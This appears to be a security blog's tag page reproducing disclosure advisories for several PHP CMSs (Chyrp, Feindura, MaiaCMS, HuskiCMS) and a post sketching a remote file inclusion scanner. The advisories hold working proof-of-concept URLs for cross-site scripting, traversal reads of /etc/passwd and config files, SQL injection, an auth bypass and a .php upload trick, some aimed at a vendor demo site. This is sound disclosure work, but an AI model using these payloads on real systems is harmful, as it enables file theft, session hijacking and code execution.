Results tagged “file inclusion” from Just Another Hacker

--------------------------------------------------------------------------------------------
20110713 - Justanotherhacker.com : Chyrp - Multiple vulnerabilties
JAHx113 - http://www.justanotherhacker.com/advisories/JAHx113.txt
--------------------------------------------------------------------------------------------

Chyrp is a blogging engine designed to be very lightweight while retaining functionality. It
is powered by PHP and has very powerful theme and extension engines, so you can personalize
it however you want. The code is well-documented, and it has a very strong structure that's
loosely based on the MVC design pattern
[ Taken from: http://chyrp.net ]


--- Vulnerability description ---
The chyrp blogging engine was found to suffer from multiple vulnerabilities in multiple versions.
Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: High
Release: Responsible, via oCERT
CVE: Not yet assigned
Vendor: chyrp.net
Affected versions: <= 2.1

--- Cross site scripting ---
The action parameter is not sufficiently filtered, escaped or encoded resulting in cross site scripting.
Exploit:
http://domain/path/admin/?action=[XSS]
http://domain/path/includes/javascript.php?action=[XSS]
PoC:
The javascript.php xss can also be invoked through rewrite rules using the following querystring -
http://domain/path/?%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E;url=blah

--- Cross site scripting ---
The title and body parameters are not initialized in the admin/help.php file resulting in cross site
scripting if register globals is on.
Exploit:
http://domain/path/admin/help.php?title=[XSS]&body=[XSS]

--- Local file inclusion ---
The action parameter is not sufficiently filtered and vulnerable to local file inclusion.
Exploit:
http://domain/path/?action=[LFI]
PoC:
http://domain/path/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpassword%00

--- Directory traversal ---
The file parameter for includes/lib/gz.php is vulnerable to a directory traversal bug in Chyrp versions <=2.0.
This is due to a php gotcha when using the return value of strpos in an if statement as matches on position 0
will result in a false negative.
Exploit:
http://domain/path/includes/lib/gz.php?file=/themes/../../../../../../[PATH]
PoC:
http://domain/path/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd
http://domain/path/includes/lib/gz.php?file=/themes/../includes/config.yaml.php


--- Arbitrary file upload ---
Arbitrary file upload can be done by authorised users in Chyrp version <= 2.0 with the swfupload extension and
file upload feathers enabled. The uploaded file extension is restricted through javascript. Modify js in page
using firebug or via intercepting proxy to allow *.php upload. A direct POST to
http://domain/path/modules/swfupload/upload_handler.php can also be done, but changing js is far easier.

PoC:
Appended ;*.php in script for the add photo feather (http://domain/path/admin/?action=write_post&feather=photo) using intercepting proxy
<script type="text/javascript">
$(function(){
$("#photo").clone().attr("id", "photo_fake").addClass("swfupload_button").insertBefore("#photo")
photo = new SWFUpload({
upload_url : "http://localhost/chyrp_v2.0/modules/swfupload/upload_handler.php",
flash_url : "http://localhost/chyrp_v2.0/modules/swfupload/lib/swfupload.swf",
post_params: {"PHPSESSID" : "5o3bnghnijk4hlr7vnshi3vb76", "PHPSESSNAME" : "ChyrpSession", "ajax" : "true" },
file_size_limit : "100 MB",
file_types : "*.jpg;*.jpeg;*.png;*.gif;*.bmp;*.php", <-- #MODIFY!
file_types_description : "All Files",

file_queue_error_handler : fileQueueError,
file_dialog_complete_handler : fileDialogComplete,
upload_start_handler : uploadStart,
upload_progress_handler : uploadProgress,
upload_error_handler : uploadError,
upload_success_handler : uploadSuccess,
button_placeholder_id : "photo",
button_width : $("#photo_fake").width(),
button_height : $("#photo_fake").height(),
button_action : SWFUpload.BUTTON_ACTION.SELECT_FILES,
upload_complete_handler : uploadComplete
})
$("#SWFUpload_0")
.css({ position: "absolute", top: $("#photo_fake").offset().top, left: $("#photo_fake").offset().left })
.before('<div id="progress"><div class="back"><div class="fill"></div><div class="clear"></div></div></div>')
})
</script>

--- Solution ---
Upgrade to version 2.1.1

--- Disclosure time line ---
13-Jul-2011 - Public disclosure
17-May-2011 - Vendor notified
17-May-2011 - oCERT notified

--------------------------------------------------------------------------------------------
20101028 - Justanotherhacker.com : Multiple vulnerabilities in Feindura CMS
JAHx104 - http://www.justanotherhacker.com/advisories/JAHx104.txt
--------------------------------------------------------------------------------------------


Feindura is a Open Source flat file based Content Management System for Web Designers,
written in PHP. There is no need of a database and it's easy to integrate in your Websites
[ Taken from: http://feindura.org ]

--- Vulnerability description ---
Feindura CMS sufferes from multiple vulnerabilities.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: Medium
Release: Responsible
Affected versions: <= 1.0rc

--- Cross site scripting ---
The category parameter provided to editor.php is not sufficiently filtered and is vulnerable to cross site scripting.
Looking at the source we can see the variable gets assigned direclty from user input and later used in output.
library/sites/editor.php:24   $category = $_GET['category'];
library/sites/editor.php:186  echo '<form action="'.$_SERVER['PHP_SELF'].'?category='.$category.'&amp;page='.$page.'" method="post" accept-charset="UTF-8" id="editorForm">
Exploit:
http://[host]/[path]/library/sites/editor.php?category=[XSS]
PoC:
http://demo.feindura.org/library/sites/editor.php?category=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

--- Local file inclusion ---
The download.php script does not apply base path restrictions on the filename, this allows for arbitrary file reads.
library/process/download.php:22 header('Content-Type: x-type/subtype'); //"Bug-Fix" für den IE 4.x &
 5.x
library/process/download.php:23
library/process/download.php:24 readfile(DOCUMENTROOT.$adminConfig['savePath'].$_GET['group
'].'/'.$_GET['filename']);
Exploit:
http://[host]/[path]/library/process/download.php?filename=[path/to/file]
PoC:
http://demo.feindura.org/library/process/download.php?filename=../../../../../../../etc/passwd

--- Local file inclusion ---
The filemanager script does not apply base path restrictions on the path, this allows for arbitrary file reads.
The vulnerable code is as follows:
library/thirdparty/filemanager/connectors/php/filemanager.php:72                   case 'download':
library/thirdparty/filemanager/connectors/php/filemanager.php:73                           if($fm->getvar('path')) {
library/thirdparty/filemanager/connectors/php/filemanager.php:74                                   $fm->download();
library/thirdparty/filemanager/connectors/php/filemanager.php-75                           }
library/thirdparty/filemanager/connectors/php/filemanager.class.php:245    public function download() {
library/thirdparty/filemanager/connectors/php/filemanager.class.php-246            if(isset($this->get['path']) && file_exists($_SERVER['DOCUMENT_ROOT'] . $this->get['path'])) {
library/thirdparty/filemanager/connectors/php/filemanager.class.php:247                    header("Content-type: application/force-downloa ");
library/thirdparty/filemanager/connectors/php/filemanager.class.php-248                    header('Content-Disposition: inline; filename="' . $_SERVER['DOCUMENT_ROOT'] . $this->get['path'] . '"');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-249                    header("Content-Transfer-Encoding: Binary");
library/thirdparty/filemanager/connectors/php/filemanager.class.php-250                    header("Content-length: ".filesize($_SERVER['DOCUMENT_ROOT'] . $this->get['path']));
library/thirdparty/filemanager/connectors/php/filemanager.class.php-251                    header('Content-Type: application/octet-stream');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-252                    $tmp = explode('/',$this->get['path']);
library/thirdparty/filemanager/connectors/php/filemanager.class.php-253                    $filename = $tmp[(sizeof($tmp)-1)];
library/thirdparty/filemanager/connectors/php/filemanager.class.php-254                    header('Content-Disposition: attachment; filename="' . $filename . '"');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-255                    readfile($_SERVER['DOCUMENT_ROOT'] . $this->get['path']);
library/thirdparty/filemanager/connectors/php/filemanager.class.php-256            } else {
library/thirdparty/filemanager/connectors/php/filemanager.class.php-257                    $this->error(sprintf($this->lang('FILE_DOES_NOT_EXIST'),$this->get['path']));
library/thirdparty/filemanager/connectors/php/filemanager.class.php-258            }
library/thirdparty/filemanager/connectors/php/filemanager.class.php-259    }
Exploit:
http://[host]/[path]/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=[path/to/file]
PoC:
http://demo.feindura.org/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=/../../../../../../../../etc/passwd

--- Local file inclusion ---
Language selection code does not sufficiently filter the supplied variable, resulting arbitrary file reads and code execution.
Vulnerable code:
index.php:26 include("library/backend.include.php");
library/backend.include.php:46 if(isset($_GET['language']))
library/backend.include.php:47   $_SESSION['language'] = $_GET['language'];
library/backend.include.php-56 // includes the langFile which is set by the session var
library/backend.include.php:57 $langFile = include(dirname(__FILE__).'/lang/'.$_SESSION['language'].'.backend.php');
library/backend.include.php-58
Exploit:
http://[host]/[path]/?language=../../../../../../../etc/passwd%00
PoC:
http://demo.feindura.org/?language=../../../../../../../etc/passwd%00

--- Solution ---
Password protect your feindura installation.
These issues are fixed in the coming 1.1 version.

--- Disclosure time line ---
28-Oct-2010 - Public disclosure
18-Oct-2010 - Vendor response
18-Oct-2010 - Vendor notified through email

Writing a better RFI scanner

|
So had this chat with the boys in the office the other day and mentioned my long standing thoughts on how automated remote file inclusion scans should be done right, and figured I might as well share it with everyone.

Most tools today will just try to fetch a web url, like http://www.google.com and claim that it has found a remote file inclusion. I suppose technically it is still accurate, but I mostly care for code execution, not so much web proxy scripts. To be honest, detecting code execution is pretty trivial. Sure it becomes more annoying as you try to support multiple languages, but for now, lets focus on the worst RFI offender; PHP.

Lets pretend I'm writing a scanner, and this scanner uses the normal crawl and replace querystring values with my RFI url approach. My first port of call is to create a code snippet that I will use for testing code execution with. I've picked the string just another remote file inclusion! as my signature. Now we add some complexity to ensure that we don't accidentally get a false positive on the remote chance that the webpage we're fuzzing happened to contain that string.

~$ echo -n 'just another remote file inclusion!' | md5sum -
8a7f7dc99a12132a94c88b931e92f463  -
~$ echo -n '8a7f7dc99a12132a94c88b931e92f463' | uuencode -m -
begin-base64 644 -
OGE3ZjdkYzk5YTEyMTMyYTk0Yzg4YjkzMWU5MmY0NjM=
====
This gives me both the code exec and non code exec signatures. We stuff the base64 into a php file like so: [RFIproof.txt]
<?php echo(base64_decode('OGE3ZjdkYzk5YTEyMTMyYTk0Yzg4YjkzMWU5MmY0NjM=')); ?>
Then I write a simple snippet to check for RFI:
sub check_RFI_exec {
    my ($url, $querystring, $fuzzparam) = @_;   #Function arguments
    $querystring =~ s!$fuzzparam=[^&]+!$fuzzparam=http://www.justanotherhacker.com/RFIproof.txt!;   #Using ! to avoid escaping characters
    my $content = get("$url?$querystring");    # Fetching url using lwp-simple 
    if ($content =~ m/8a7f7dc99a12132a94c88b931e92f463/) {    #md5sum means base64_exec'ed
        print "RFI code exec at: $url?$querystring\n";
   } elsif ($content =~ m/OGE3ZjdkYzk5YTEyMTMyYTk0Yzg4YjkzMWU5MmY0NjM=/) {   #base64 string means no exec
       print "RFI without exec: $url?$querystring\n";
   }
}
I chose perl, but you can write yours in whatever language you choose. Adding some error handling is recommended, but I left it out as it's only a hypothetical code snippet. I'm not actually writing this scanner, but hopefully someone else will.

Custom graudit signatures

|
Writing your own graudit signatures is relatively easy. Mastering regular expressions can be helpful, but in their simplest form a list of words will do. I have tried to document some of the common pitfalls that might creep up on you in my Ruxmon presentation, but I know how "useful" a single slide can be. I am catching up on graudit documentation and signatures is just around the corner. Until then, I thought I would share with you some of the databases I use when looking for low hanging fruit and want to reduce the information overload (noise) that you normally get from the php ruleset. Signatures after the break to avoid spamming rss readers.

--------------------------------------------------------------------------------------------
20100625 - Justanotherhacker.com : Multiple vulnerabilities in maiacms
JAHx103 - http://www.justanotherhacker.com/advisories/JAHx103.txt
--------------------------------------------------------------------------------------------

MaiaCMS is an open source PHP based content management system (CMS). It is designed with simplicity in mind to help you easily build and maintain your web site. It is freely available to everyone.
[ Taken from: http://maiacms.sourceforge.net/ ]

--- Vulnerability description ---
Multiple vulnerabilities exist in maiacms, here are some of them.

Discovered by: Eldar "Wireghoul" Marcussen
Severity: Low
Release: Full disclosure
Affected versions: 0.1

--- SQL injection ---
The index.php script does not properly sanitize the page parameter, resulting in several paths to SQL injection.
PoC:
/index.php?page=1' or 'a'='a

--- Local file inclusion ---
The admin/index.php script does not properly sanitize the com or file parameters, resulting in local file inclusion.
PoC:
/admin/index.php?com=../../../../../../../../etc/passwd%00

--- Authentication bypass ---
Most of the admin pages has a check and redirect to login snippet to validate login:
list_pages.php:1:<?php
list_pages.php:2:    require ("../includes/connections.php"); //Includes functions and database connection
list_pages.php:3:    
list_pages.php:4:    if (empty($is_admin)) {
list_pages.php:5:        header("Location: login.php");
list_pages.php:6:    }
However it does not halt execution after the header redirect. This allows code to be executed past the point of redirection.

PoC:
curl 'http://maiacms.sourceforge.net/admin/list_pages.php?id=1&category=1'

--- Session control ---
The script update_session.php relies on the the aforementioned access control weakness and allows the session data to be changed or created directly through a HTTP POST operation.
update_session.php:1:<?php
update_session.php:2:require_once("../includes/connections.php");
update_session.php:3:
update_session.php:4:if (empty($is_admin)) {
update_session.php:5:        header("Location: /admin/login.php");
update_session.php:6:    }
update_session.php:7:    
update_session.php:8:foreach ($_POST as $key => $value) {
update_session.php:9:    $_SESSION[$key] = $value;
update_session.php:10:}
update_session.php:11:
update_session.php:12:$db->Close();
update_session.php:13:?>

--- Solution ---
Wait for the next or non alpha release

--- Disclosure time line ---
25-Jun-2010 - Public disclosure
25-Jun-2010 - Vendor notified through email
25-Jun-2010 - Vendor response

--------------------------------------------------------------------------------------------
20100205 - Justanotherhacker.com : HuskiCMS local file inclusion
JAHx102 - http://www.justanotherhacker.com/advisories/JAHx102.txt
--------------------------------------------------------------------------------------------

HuskiCMS
huski CMS effectively places the control of the website back into the hands of you, the site owner. huski CMS is extremely user friendly and has been developed with the lowest denominator in IT knowledge in mind. huski CMS is still a very powerful and flexible system which ensures your site is using the latest technologies such as AJAX, XML, XHTML, and CSS
[ Taken from: http://www.huskicms.com ]


--- Vulnerability description ---
A conditional local file inclusion exists in the image resizing script size.php's i parameter.
The parameter is not filtered and allows arbitrary file inclusion.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Local File Inclusion
Severity: Low
Release: Responsible
CVE: None
Vendor: ASCET Interactive - http://www.ascetinteractive.com
Affected versions:
Unknown

--- Proof of Concept ---
~$ GET 'http://[target]/size.php?i=index.php'
<?php
    header ('Content-Type: text/html; charset=utf-8');
    // Data Includes
    include_once "PHPLib/db_mysql.inc";
    include_once "Data/dbConnection.class.php";
    include_once "Data/dbConfig.class.php";
    include_once "Data/dataAdapter.class.php";
    include_once "Quicksite/Core/domxml.class.php";


    // Quicksite Core Includes
    include_once "Quicksite/Core/all.inc.php";
    
    // Configuration
    include_once "Quicksite/db.config.php";
    include_once "inc/vars.config.php";

    // Initialise the Site
    $site = new Site($_VARS['site']);
    print_r($_SESSION['login']);
    // Initialise the Page
    $page = new Page($site, $_GET['id'], array_merge($_POST, $_GET));

    // Load plugin sources
    $page->loadPluginSources();
   
    // Create the Page
    $page->createPage();
   
    echo $page->Result;
?>


--- Solution ---
Upgrade to a more recent version

--- Disclosure time line ---
05-Feb-2010 - Public disclosure
29-Jan-2010 - Vendor acknowledge vulnerability
28-Jan-2010 - Vendor notified through email
 
No Clean Feed - Stop Internet Censorship in Australia
Creative Commons License
This weblog is licensed under a Creative Commons License.